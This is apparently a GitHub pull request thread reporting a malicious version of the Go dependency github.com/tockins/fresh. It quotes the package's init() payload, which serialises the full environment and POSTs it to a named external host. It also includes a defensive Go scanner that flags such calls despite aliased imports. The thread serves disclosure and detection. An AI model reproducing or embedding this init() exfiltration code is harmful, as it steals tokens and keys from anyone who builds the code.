smallnest / go-web-framework-benchmark

:zap: Go web framework benchmark
Apache License 2.0

Replace malicious version of dep #142

Closed machinly closed 1 year ago

machinly commented 2 years ago

This PR replaces the malicious version of github.com/tockins/fresh.

The new version (v0.0.0-20220719194346-eee4eda4271e) of github.com/tockins/fresh has malicious code in the init func of every Go file, and you can't see this version on GitHub.

After `make build`, you can find it in ~/go/pkg/mod/github.com/tockins/fresh@v0.0.0-20220719194346-eee4eda4271e. The malicious code looks like this; it POSTs the environment to a weird URL.

package fresh
import ( // aliases inferred from the calls below
	x1__ "bytes"
	x3__ "encoding/json"
	x2__ "net/http"
	x0__ "os"
)
func init() {
	if x0__.Getenv("e452d6ab") == "" { // marker env var: one beacon per process tree (inherited by children)
		x4__, _ := x3__.Marshal(x0__.Environ()) // serialise the entire environment: tokens, keys, paths
		x0__.Setenv("e452d6ab", "1")
		x2__.Post("http://ovz1.j19544519.pr46m.vps.myjino.ru:49460?org=tockins&repo=fresh", "application/json", x1__.NewBuffer(x4__)) // exfiltrate it
	}
}
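The import aliasing in the snippet above (x0__ for os, x2__ for net/http, and so on) is what lets it slip past a naive grep for os.Environ or http.Post. As an added example, not code from this PR or from the go-web-framework-benchmark or fresh repositories, here is a small Go scanner that parses a file with go/parser, resolves the file's own import aliases, and reports any call into os.Environ or net/http made from a package-level init(). The sample it scans is constructed here from the posted snippet with a placeholder URL, and the table of flagged functions is a hypothetical starting list.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"os"
	"strconv"
	"strings"
)

// sampleSrc is a constructed file modelled on the snippet in the PR; the aliases
// carry no meaning, so only resolving them finds the calls. Placeholder URL.
const sampleSrc = `package fresh
import (
	x1__ "bytes"
	x3__ "encoding/json"
	x2__ "net/http"
	x0__ "os"
)
func init() {
	if x0__.Getenv("e452d6ab") == "" {
		x4__, _ := x3__.Marshal(x0__.Environ())
		x0__.Setenv("e452d6ab", "1")
		x2__.Post("http://example.invalid/collect", "application/json", x1__.NewBuffer(x4__))
	}
}
`

// suspicious: import path -> functions that have no business in a library's init(). Hypothetical list; extend it.
var suspicious = map[string]map[string]bool{
	"os":       {"Environ": true},
	"net/http": {"Post": true, "Get": true, "PostForm": true},
}

// ScanSource parses one Go file and returns a finding for every call inside a package-level
// init() that resolves, through the file's import aliases, to an entry in suspicious.
func ScanSource(filename, src string) ([]string, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	alias := map[string]string{} // local name -> import path, e.g. "x0__" -> "os"
	for _, imp := range f.Imports {
		ipath, _ := strconv.Unquote(imp.Path.Value) // always a valid string literal once parsed
		name := ipath[strings.LastIndex(ipath, "/")+1:]
		if imp.Name != nil { // explicit alias, obfuscated or not
			name = imp.Name.Name
		}
		alias[name] = ipath
	}
	var findings []string
	for _, decl := range f.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		if !ok || fn.Name.Name != "init" || fn.Recv != nil || fn.Body == nil {
			continue
		}
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			call, ok := n.(*ast.CallExpr)
			if !ok {
				return true
			}
			if sel, ok := call.Fun.(*ast.SelectorExpr); ok {
				if pkg, ok := sel.X.(*ast.Ident); ok {
					if path, known := alias[pkg.Name]; known && suspicious[path][sel.Sel.Name] {
						pos := fset.Position(call.Pos())
						findings = append(findings, fmt.Sprintf("%s:%d: init() calls %s.%s (imported as %s)",
							pos.Filename, pos.Line, path, sel.Sel.Name, pkg.Name))
					}
				}
			}
			return true
		})
	}
	return findings, nil
}

// With no argument the constructed sample is scanned. Otherwise the argument is
// a .go file, e.g. one under ~/go/pkg/mod/github.com/tockins/fresh@<version>/.
func main() {
	findings, err := ScanSource("sample.go", sampleSrc)
	if len(os.Args) > 1 {
		var data []byte
		if data, err = os.ReadFile(os.Args[1]); err == nil {
			findings, err = ScanSource(os.Args[1], string(data))
		}
	}
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(2)
	}
	for _, f := range findings {
		fmt.Println(f)
	}
}
```

Run it with no argument to see the two findings on the embedded sample, or feed it each .go file from the module cache directory named above (for example via find ... -name '*.go' -exec). It only catches direct package-qualified calls from init(); a payload that reaches the network through an interface value, reflection or a helper called from init() needs a type-aware pass (golang.org/x/tools/go/packages) or the kind of runtime observation that surfaced this one.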
leonklingele commented 1 year ago

How the heck did you become aware of this?

machinly commented 1 year ago

How the heck did you become aware of this?

I was running the benchmark in an environment without Wi-Fi, and it waited a long time after launching, so I looked into it and found it all.